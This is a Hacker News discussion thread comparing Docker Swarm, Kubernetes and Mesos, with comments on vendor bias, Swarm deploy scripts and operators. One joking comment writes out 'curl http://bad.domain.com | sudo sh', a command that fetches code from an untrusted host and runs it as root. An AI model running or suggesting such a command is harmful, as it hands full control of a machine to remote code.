Hacker News new | past | comments | ask | show | jobs | submit login
Docker vs. Kubernetes vs. Mesos (mesosphere.com)
303 points by martymatheny on Aug 2, 2017 | hide | past | favorite | 74 comments



Those kind of articles are not so useful, Mesosphere is the company behind DC/OS and Mesos and they have all the interest in the world to say that Mesos is the best. Things like "... are willing to get your hands dirty integrating your solution with the underlying infrastructure" when talking about Kubernetes is unfair, especially if you compare Kubernetes to Mesos and not to Mesosphere DC/OS for which they provide paid services.

It is true that Mesos works on a different level, but, most of all, the two level scheduling is just a different take at the problem of abstracting physical/virtual resources. In the end, both Mesos/Marathon and Kubernetes aim at the same goal: allow developers to stop thinking about servers.

Kubernetes' great advantages is the community (which is unbelievable) and the extensibility it proposes: Third Party Resource or Custom Resource Definition, pluggable webhooks in the API Server and a number of other things that are simply not there in Marathon or any competitor which allow companies to make Kubernetes work best for their use cases.


The Kubernetes folks talk about the differences here and how you could build Mesos apps in K8s: https://github.com/davidopp/kubernetes/blob/87f2590f373306ea...

The limitation of only being able to run Containers I think will be fleeting — as docker and alternatives mature, it really won't make sense to ever use anything else when trying to get the scale that Kubernetes and Mesos is going for by abstracting out the underlying hardware and providing a framework to run sophisticated apps on undifferentiated hardware.


What's described in that doc is even easier today thanks to Operators (https://coreos.com/operators), which, to quote the description page, are "application-specific controller[s] that extend[s] the Kubernetes API to create, configure and manage instances of complex stateful applications on behalf of a Kubernetes user."

Disclosure: I work on Kubernetes at Google (and wrote the doc you linked to).


Some of us love getting our hands dirty. In my honest opinion this whole article seemed very neutral in phrasing. It wasn't until I decided to check the source after having read and enjoyed the entire article, that I discovered that it was written in a Mesos domain. And even then I applaud that they were humble enough to save their own product until the end and didn't seem to exaggerate their sales pitch.


True, it is not too much of a sales pitch, but still something that really can't be seen as impartial, for natural reasons (it comes from the company behind Mesos) and it looses a bit of clarity (Java doesn't equal legacy, you can run Stateful workloads on Kubernetes) towards the end.

From my point of view, the benefits of the two level scheduling are actually quite limited with respect to how the whole story is usually told. Some Mesos framework always use all the resources from the clusters and it might get tricky to really have multiple frameworks to run at the same time on Mesos. Also, sometimes those frameworks don't really offer so many additional features to justify changing the way you are already using Spark, Cassandra and so on.


Exactly. The frameworks that the article describes know how to run say Cassandra or Spark, but you can do the same thing in Kubernetes using TPRs or CRDs with operators:

[0]https://github.com/coreos/prometheus-operator [1]https://github.com/coreos/etcd-operator [2]https://github.com/huawei-cloudfederation/redis-operator [3]https://github.com/CrunchyData/postgres-operator [4]https://github.com/krallistic/kafka-operator [5]https://github.com/pegerto/cassandra-operator


There doesn't appear to be anything at #2 - https://github.com/huawei-cloudfederation/redis-operator.


From what I've seen, Huawei will upload it soon™


One more difference is Mesos is written in C++, while Kubernetes is written in Go.


Is that relevant?


Well for something as crucial as this you want to be able to debug and patch the code. I mean: using outside of hobby, prototyping or a startup (i.e the rest of the economy were money wants to buy off risk) this stuff cant be a magic black box. That would be so irresponsible. "Why are our servers down? We are loosing 500k per day." .. "we are getting some weird error we cant debug because we dont know the codebase, or worse, the language. But we searching for random dumb stuff to try on StackOverflow". Yeah somebody is getting fired.

So for the developers responsible for the uptime it could matter a lot if they are more comfortable with one of codebase or language they use.

Off course if you are more like a consumer app type of startup, just put all energy on UX and stuff and hope for the best. But lets hope every bank that uses this sort of stuff has a developer on call that can actually dive into the codebase.


Also many parts of Mesos ecosystem are Java. So a JVM is required to run those. It is relevant from deployment perspective.


Apart from Zookeeper, I can't remember any other Java software on Mesos ecosystem.


He at least did give information about the topic at hand

Edit: I apologize to the readers, this is not the right place for this kind of talk


Of cuz, Google open sourced a container runtime before in c++, and no one cared.


It feels downplayed in this article, so I would like to state for the record here, I am a happy user of Docker Swarm.

Swarm has been shown to scale to tens of thousands of hosts, but I found it easy to start with, especially with the Gitlab CI support, which natively brings a Docker container registry.

So I commit, CI builds my containers, stores them in my private registry, and automatically deploys from there to the Swarm in various environments. All this was much easier to setup than the alternatives.

Also, I expect an easy transition should I need to move to Mesos or k8s. If I ever need to. In the mean time I like to keep it simple.


I'm also a user of Docker Swarm - and I love it! I have extensively played with k8s and feel it has a lot of upfront complexity (especially ingress).

I feel people who are beginning to scale from one machine to 10 will love Docker Swarm (and stick with it). While those who have about 100 machines will start with Mesos/K8s.


There's no direct migration path from Swarm to Kubernetes, so we chose to start out at a small scale with the latter. It was enough of a leap to fundamentally change how we were building and deploying things. We didn't want to do it twice!

You can dodge much of the operational complexity in standing a cluster up by starting with Google Container Engine or a provisioner like kops. Once you have enough comfort, you can get more fancy and build something more customized to your cases.


actually - i think the other way.

I'm not sure if people who start with Docker Swarm will want to migrate to k8s at all. It works damn well and i have been very happy with it. It has been demonstrated to work at scale.

K8s does have Google behind it though


How do you automate the updating of images on Docker Swarm?


I do this:

    docker build -t $APPNAME:$timestamp .
    OUTPUT="$(docker service inspect -f '{{.Spec.Name}}' sv-$APPNAME || true)"
    if [ "$OUTPUT" == "" ]; then
      # Service does not exist
      echo "Creating service"
      docker service create --update-delay 5s \
        --publish $PUBPORT:8080 --replicas 2 \
        --mount type=bind,source=$(cd ../images; pwd),target=/images,readonly=true \
        --mount type=bind,source=$(cd ../processed_images; pwd),target=/app/images \
        --mount type=bind,source=$(cd ..; pwd)/config.json,target=/config.json,readonly=true \
        --mount type=bind,source=$(cd ~/.aws; pwd),target=/root/.aws,readonly=true \
        --name sv-$APPNAME $APPNAME:$timestamp
    else
      # Service exists
      echo "Updating service"
      docker service update --image $APPNAME:$timestamp sv-$APPNAME

I haven't looked in a while, but it would be nice if they had some kind of "upstall" (update/install) kinda like upsert (update/insert) in CRUD land.


I can't talk for the original poster, but I also deploy containers from Gitlab Registry via Gitlab CI pipelines and just use the standard docker swarm commands. So updating the image digest (version) of a service is as simple as running a shell command in a job in a deploy stage in your gitlab ci pipeline:

docker service update --image <some-image:version> --with-registry-auth <some-service>

Simplest example would be a job definition like this: https://pastebin.com/KsG0cDzR

This job would have to be preceded by building the new docker image you are going to update to of course.


This is the easiest part, you just call:

  docker service update --image $image_name:$new_sha $service_name
and Swarm handles the rest. You can even pass in rolling update options, so the container updates are staggered. Put this into a simple bash script that only runs when the current branch is master. (Because your CI is building every branch to give you fast feedback, right?) In the case of CircleCI or TravisCI, that can be done with something like:

  if [ "${CIRCLE_BRANCH}" == "master" ]; then


What I've found to work well is to push images to your registry with a different tag for each release. For instance, you have "web:1.0" running in production and want to update? Create a "web:1.1" image, push it to your registry and in Docker Swarm, point your "web" service to the "web:1.1" image instead of "web:1.0".


I define a docker stack .yml file, and have GitLab CI run docker stack deploys.


*Marathon on Mesos. :P


I guess I should expect some bias given the publisher, but despite a good technical write-up of the difference, their conclusions aren't really backed up by the rest of the article and the wording is obviously slanted towards their own product.

> While there are multiple initiatives to expand the scope of the project to more workloads (like analytics and stateful data services), these initiatives are still in very early phases and it remains to be seen how successful they may be.

StatefulSets have been in Kubernetes since 1.5 (two versions ago) and while some aspects of them still could do with a bit of work, calling it "very early stages" is unfair, as is the suggestion that there's still not any single approach to it.

> If you want to build a reliable platform that runs multiple mission critical workloads including Docker containers, legacy applications (e.g., Java), and distributed data services (e.g., Spark, Kafka, Cassandra, Elastic), and want all of this portable across cloud providers and/or datacenters, then Mesos (or our own Mesos distribution, Mesosphere DC/OS) is the right fit for you.

It's not clear from the article why Mesos is "a reliable platform" but Kubernetes is implied not to be. I'm also not sure why the frequent references to Java as a special case either - you obviously can run Java services on top of Kubernetes as well.


They said legacy applications. You can run a command or script or binary in Mesos / marathon. In Kubernetes, you can run only containers. So at the minimal, your legacy app has to be containerized / dockerized.


> You can run a command or script or binary in Mesos / marathon.

Where does the binary come from, if not from a container?


  curl http://bad.domain.com | sudo sh
naturally

To be fair, we put our payloads on S3 and tell our universal executor to fetch & unpack them & run a configured command. We successfully wrote an xargs-replacement as a Mesos framework which worked pretty well.


And in kubernetes land, you can run an ubuntu container and do that just as well. Except, you'll lose out on having all the shared resources and state of your host machine. If that sounds scary to you, you should take a minute to think about it the other way - Under the mesos realm, every process can modify the state shared by every other process. If that hasn't convinced you off mesos, than I wish you all the luck you deserve, but not the luck you'll need.


3/10 patronizing and FUD. Mesos is happy to limit resources with cgroups etc. When you say

  every process can modify the state shared by every other process
in italics (the scariest type variant), do you mean ‘the filesystem’? Mesos has a swathe of isolators to choose from to enforce separation. Mesos is also happy to let tasks run as a specific user, so the good old Unix process model will stop random tasks from stomping each other.

Did you see the other comments drawing attention to the inequality of the Mesos/Kubernetes comparison & suggesting Marathon as the more appropriate peer technology?


In Marathon you would specify it as a URI. See:

https://mesosphere.github.io/marathon/docs/application-basic...

The Mesos executor can run shell commands or Docker containers.


I recently evaluated all 3 solutions. Here is how I see it after testing the waters:

- want something simple that works today? Docker Swarm

- want something amazingly flexible? Kubernetes

- already use Mesos or DC/OS? Marathon/Mesos

This article from Mesosphere is interesting and gives a good overview, but it downplays advantages of Swarm and Kubernetes and clearly highlights Mesos: Docker has 4 bullet points, Kubernetes has 3 and Mesos has 5.

In addition, Marathon is meant to work on Mesosphere DC/OS and not on other operating systems. For instance, the "Virtual IP" [1] feature only works on DC/OS from what I can tell. This confused me because this feature appears on the UI even if you run Ubuntu, it just doesn't work in that setup.

Docker Swarm seems to have a very comparable feature set, but doesn't care what OS you run.

There is an Mesos plugin for Kubernetes [2] but it looks unmaintained, so this sentence seems a bit off: "Mesos could even run Kubernetes or other container orchestrators, though a public integration is not yet available." This also goes to show how important community support and commercial backing is and Kubernetes is the clear winner here.

At the end, you can read this: "want all of this portable across cloud providers and/or datacenters, then Mesos (or our own Mesos distribution, Mesosphere DC/OS)". With Docker Swarm, you can use multiple cloud providers. Docker Swarm does not care about what servers you use. It encrypts traffic between nodes and needs Docker. That's it. It is cloud agnostic. I'm not sure what the story is with Kubernetes here. Kubernetes is a huge beast: very flexible and powerful, but a high upfront setup cost when you want to manage everything yourself.

[1] https://dcos.io/docs/1.9/networking/load-balancing-vips/

[2] https://github.com/mesosphere/kubernetes-mesos


Kubernetes runs on GCP, AWS, and Azure, and in various on-prem configurations (including on OpenStack).

Disclosure: I work on Kubernetes at Google.


Hello David, thanks for your input here! I was wondering specifically about a hybrid cloud / multi-az setup. Does Kubernetes support that?


I'm not David but the answer is yes. After spinning up multiple discrete clusters, you can orchestrate across them by deploying the federation control plane.

https://kubernetes.io/docs/concepts/cluster-administration/f...


Uh. I'm skeptic about Swarm being something that "works today". I really want to use it and spent some time experimenting, but failed to get it working. It could work for a toy webapp project, but I believe is insufficient for anything complicated. There are a lot of things that one would expect to have but that are yet unsolved. Or I'm just unaware that there is a solution (or the solution didn't fit my personal requirements).

1. Networking options are really limited.

Built-in ingress loses of the originating IP address, cannot bind ports only on specific nodes (something that may have partially fixed this was implemented in 17.06 with --network=host option, but I haven't found much documentation), cannot prefer same-node containers (which is important if you have many microservices, as the latency adds up quickly) and more.

For ingress, if one's lucky to have only HTTP traffic (I don't), they can use something like Traefik. But they'll need to run LBs on a manager nodes which isn't really a smart thing to do, as Swarm is said to be sensitive to overloaded managers. Or one can just go for external LBs, like CloudFlare or whatever Amazon/Google/Microsoft offers.

If one needs raw TCP, UDP or other IP traffic - I think they'd better completely ignore built-in service discovery and LBs and go for something external, like etcd+haproxy/nginx, outside of the Swarm (on nodes' host OS). It has to be completely manual setup (okay, I meant Ansible/Puppet/Chef/Salt/etc). While it's possible to run LBs with Docker (non-Swarm containers, if the Swarm network is attachable), etcd is just not designed to auto-deploy on Swarm: its design explicitly disallows one to just `docker service create --name etcd my/custom/etcd && docker service scale etcd=5`, you'll need to set up every node by hand. I believe Consul is better in this regard but haven't tried it yet.

2. I haven't figured out how to have a persistent storage that follows the containers. If a node dies, Swarm would spawn new containers on other nodes, but no chance to have even a slightly dated snapshot. There was something called Flocker that looked like a solution, but it's essentially dead (despite the revival attempts). GlusterFS is an option I know about, but it's really sensitive to latency.

Databases are even more tricky, unless one's bold to use something fancy like CockroachDB (I had enough subtle issues with RethinkDB to be wary about bleeding edge stuff). Maybe I'm just too stupid, but I failed to grok dynamic PostgreSQL multi-master BDR setup, so my DB is still SPOF with some WAL streaming replication manually-activated failovers.

3. Secrets look like a nice addition, but they're best avoided. They're immutable and you have to recreate the container to switch them. If you have any services that have many user-initiated long-living connections (e.g. IRC, XMPP, Websockets or media streaming), this would makes secrets basically unusable for anything that could be rotated, like TLS certificates. Unless you can drop all your users every now and then.

4. Logging was quite messy, but they've sorted it out with 17.06.

(As for the K8S - it solves most of the issues, but I got my share of issues with Rancher, so I'm really wary about having any complexity in the core. There's already a beast called Linux kernel down there, and $deity have mercy on those who have to debug its oopses. If a behemoth - I mean, K8s - decides to misbehave, I expect to have a really bad time trying to keep things afloat. Even Swarm mode is fairly complex black box binary - but at least I can try debugging it.)


Regarding persistent storage following containers, check out REX-Ray: https://rexray.readthedocs.io/en/stable/ as it works with various storage options.


1. You can use host-mode port binding (equivalent of `docker run -p` as opposed to the routing mesh), you could also use macvlan/ipvlan to do this.

2. Indeed this is tricky right now. One way to sort-of fake it is you can do something like `--mount type=volume,source='important_data{{.Task.Slot}}'`... I'm not sure I would call this a recommendation, but worth playing with. But also I'm not sure if automatic failover of databases is truly a thing, it's just not that easy (outside of the storage aspect).


I do think it's a fight to the death for container orchestrators. The configuration files required to run complex auto-scaling systems can add up (and require DEEP understanding of all the systems involved and how they interact with each other) - Most developers don't want to have to do it for more than one orchestrator; especially since there is no straightforward migration path from one orchestrator to another.

Also, learning different orchestrators is a lot of work. Sure, maybe Mesos does more than just schedule containers, but that doesn't matter because a standardized orchestration platform is the main thing developers need right now - For orchestration to become truly standardized, there needs to be a single big majority winner.

It reminds me of the Minix vs Linux debate in the early days of operating systems; Minix was modular (microkernel) while Linux was monolithic. The reason why Linux won is because it provided a single consistent standard platform on which to build and configure applications. I think the same is going to happen here and I think that Kubernetes or Swarm are better placed in that regard.


I'm not sure if I agree. There are many frameworks in the devops space with each having their own DSLs that had various learning curves. For example, I see companies split between Puppet, Chef, Salt, Ansible, etc...

It sucks, don't get me wrong, that there one hasn't come away from the pack, but I don't think it's likely that any of these orchestration frameworks will go away. Each of them have a pretty dedicated following with lots of developers behind it.


>The reason why Linux won is because it provided a single consistent standard platform

I suspect there were many reasons. One reason it might have won vs minix was broader driver support for various video, network, sound cards, etc.


> The configuration files required to run complex auto-scaling systems can add up

Is there a tool for managing orchestration config?

I am very interested in learning the current status.


just watched a demo about http://codesolvent.com/ on monday, seems like they are providing a solution for configuration management that is oriented towards cloud orchestration.

i'm sure there are others, but this was fresh in my mind


I am a relatively unhappy user of mesos marathon and chronos migrating to k8. While it would take a long time to mention all the reasons and I might do a writeup, one of the main things that pushed us to k8 was the code quality / bugs in the mesos stack. Minor examples are the bugs breaking HA + SSL in combination (mesos + marathon, fixed now) the odd bugs in chronos, where a major 3.0 release would forever append CMD to CMD modifying its own supposedly immutable config into a never ending string, the list is relatively long but we are spending too much time catching edge case bugs, which seem to be a side effect of a fairly loosely coupled stack that doesn't get tested enough.

Overall so far we are much happier with k8 in terms of both quality, and it's batteries included stance in most issues.


As someone rather unfamiliar with the differences in cloud containerization options, I've been extremely confused anytime I see extremely opinionated arguments about cloud infra. This article was a breath of fresh air and is exactly the reference guide that I have been looking for. The author provides a clear history of the development of the titular systems, provides an in-depth overview of their various strengths, and adequately describes the differences in architecture. Overall, an excellent read for the uninitiated.

I have previously tried to investigate why Kubernetes was considered useful [1], or why everyone was losing their minds over Docker [2]. But rarely came away with any clear insights.

[1] https://www.kubernetes.io/case-studies/box/ [2] http://www.quotecolo.com/the-case-for-docker-against-cloud-v...


Be aware, though, that this article is clearly partisan.


I would like to share my personal experience running Meoss.

I have been using Pure Mesos setup, without DC/OS for 2.5 years.

We have the following infra features.:

- 120 micro-services running using marathon.

- 10 batch jobs running using Chronos.

- So far, everything is reliable and no downtime.

- We have Ip-Per-Task enabled with Project Calico.

- We have Public, Private, and IP Access-list enabled per container using Nginx and ELBs.

- The max number of containers we ran on the cluster so far is 3620 containers.

- We have detailed graphs monitoring per-container generated automatically.

- We have (slack #alerts) alerting enabled.

- We have secrets store using vault.

In the end we had to use (Mesos, Marathon, Chronos, Vault, Consul, Nginx, Calico, ELK, TICK.) on AWS.

The thing is, We had to configure these things to work together nicely so it is not out-of-the-box solution. Even though we haven't used Kubernetes yet, we are not religious to Mesos.

But at the moment, it seems we have everything we need and the team is happy with the current setup.


May I ask, any further details on the use cases or plain use of the networking landscape on your setup?


I use that for 2 scenarios:

- to deploy on demand staging or QA environment including its dependencies.

- allow service/infra devs to try services quickly without the need to use Terraform or to buy expensive instances in the first stage of the development.


Why should there be an assumption of (full) objectivity on an article written by one provider of the 3 technologies that are being compared? Whit that said the article is fairly balanced in presenting some layers of the whole context (mostly the historical one).

Although I would mention Google tried to have their own Docker but that didn't pan out (https://github.com/google/lmctfy) so they switched to Docker and had Kubernetes open-sourced. More historical details would have just made for a longer (albeit more interesting) article I guess.

Now to actual context. While they mention Swarm is not in CNCF and under tight control of Docker Inc. they don't mention that while Mesos is in ASF, Mesosphere hired the majority of the PMC (committers with voting rights). and the rest of the DC/OS is not even in ASF so doesn't even have to abide to the rules of the ASF. At the same time, Mesosphere heavily used the Mesos brand by mixing Mesos-phere and DC/OS into everything Mesos.

So the reason people talk about Mesos, Marathon, DC/OS and Mesosphere as almost synonyms is because they made it so. Marathon used to be a Mesos framework and service scheduler, now it's a DC/OS one for the most part (https://news.ycombinator.com/item?id=13656193)

However, in the process, they managed to alienate a part of the community too, all this while Kubernetes was able to do probably one of the best community jobs in OSS and skyrocketed (https://trends.google.com/trends/explore?q=mesos,kubernetes). That must be a bitter irony if you consider that initially Kubernetes was supposed to be just a Mesos framework...

So yes, Mesos is lower level and with the two phase scheduling it should be more versatile, etc. but that value is highly diminished if you consider the focus is around DC/OS.

I think there are several angles that make this whole context interesting. Perhaps it would be worth a full writing...


> initially Kubernetes was supposed to be just a Mesos framework...

This is not correct. There is a community-owned project that allows Kubernetes to run on Mesos, but it came after standalone Kubernetes.

Disclosure: I work on Kubernetes at Google.


Then perhaps you could ask John Wilkes ;)

later edit: I'm referring to the fact that when Kubernetes came out it didn't have resource allocation and the answer to "how it compares to Mesos" was that it would run on top of Mesos as a framework.

John Wilkes gave a talk about Kubernetes at MesosCon in 2014 https://www.youtube.com/watch?v=VQAAkO5B5Hg and also answered the above question quite a bit while there...


Kubernetes was not designed with the intention that it would be a Mesos framework. But I think it's very cool that people figured out how to make it work as one!

From pre-1.0, Kubernetes did resource allocation for CPU and memory via its cluster-level scheduler, enforced on the node using the standard container isolation mechanisms provided by Docker.

Disclosure: I work on Kubernetes at Google.


This article hilariously makes it seem as though Google hadn't thought about using Linux cgroups and namespaces to manage processes before dotcloud conceived of Docker.

Nothing could be further from the truth. Google has been doing "containers" since before dotcloud was even a company.


This is addressed:

>Google had tremendous experience with containers (they introduced cgroups in Linux) but existing internal container and distributed computing tools like Borg were directly coupled to their infrastructure.


Ah I missed that, touché


One more company with a "pricing" page that has no pricing information on it.


IIRC $5k per node, per year.


Oh. Well. That would explain it. Thanks.


Kubernetes running on DCOS is mentioned, but not treated as a real alternative. Kubernetes can run as an app on top of Mesos the same way marathon can. Note: I am a heavy user of Kubernetes, but not Mesos, so I can't comment how well it works.

Kubernetes uses "two phase scheduling" and Mesos can be plugged as a second phase (e.g. https://github.com/kubernetes-incubator/kube-mesos-framework... seems decent). For me it seems like a perfect combination - on the cloud you utilize cool stuff like GKE or https://azure.microsoft.com/en-us/blog/announcing-azure-cont... for phase 2 of schedule, but if your client wants to run your code to run on their servers you can run it on their mesos/dcos deployment.


Too bad reviewers always forget Nomad from Hashicorp. https://www.nomadproject.io/

The only cluster management system that doesn't take 3 years to understand and doesn't depend on 42 other complicated software.


Nomad is mentioned in the article, so they hardly forgot about it.


It is true that mesos is often considered better suited to data/job oriented workloads as opposed to long running microservices applications, and I wonder why.

The argument is usually around mesos' two level scheduling paradigm with which i'm familiar, but still don't see it's practical advantages over simple master scheduler.

Does someone have any insight on this topic? (assume docker containers will be used anyway and that a single application/framework will work on the cluster)


The article is theoretically correct, but practically if you use mesos you will use marathon/aurora and you'll compare that to Kubernetes. I find Kubernetes' "cloud native" approach much more compelling for green-field projects.

BTW - the more I dove into Marathon the more I discovered how thin wrapper it is above mesos, that does most of the work including - container runtime, pulling resources, starting tasks, handling registries, and now even health checks!


Has anyone run k8s recently on DCOS (1.9)?

We're running on Azure and have spent quite a bit of time and engineering on k8s. We're trying out DCOS for frameworks like Spark. We'd prefer not to run two container infrastructures if possible.

I looked at kubernetes-mesos, its installation wasn't as simple as "dcos package kubernetes" so I'm wondering if I'm going down a path of high resistance.


I'm using Mesos in production. TL;DR - if you have less than 1000 machines, don't even think about Mesos. They don't care about you (you don't give them enough money, which they are really short of), and their system uses strategies that are effective only when you have a large number of machines.


I'm kind of saddened that BSD jails never got this kind of attention. I wonder why? Is it tooling? There was ezjail and BSDploy. iocage seems to be doing some interesting stuff, especially with respect to configuration.


I kind of wish someone had written this article from an independent viewpoint.



weird they say Kubernets are more comparable to Docker in Swarm Mode than Docker standalone, but then list the features of Docker standalone

not that I'd endorse swarm mode eh, it's very very early stages and lacks a truckload of features before it could be used in anything but the simplest node replication scenarios.


K8 already won the orchestration battle.


K8 already won the orchestration battle.

There is a battle? There is only room for a "single" orchestration platform? What about users with needs that differ from the mainstream?

I find that such a limiting worldview on deploying infrastructure. If I wanted "one size fits all" I would stay within the Microsoft environment.




Consider applying for YC's W25 batch! Applications are open till Nov 12.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: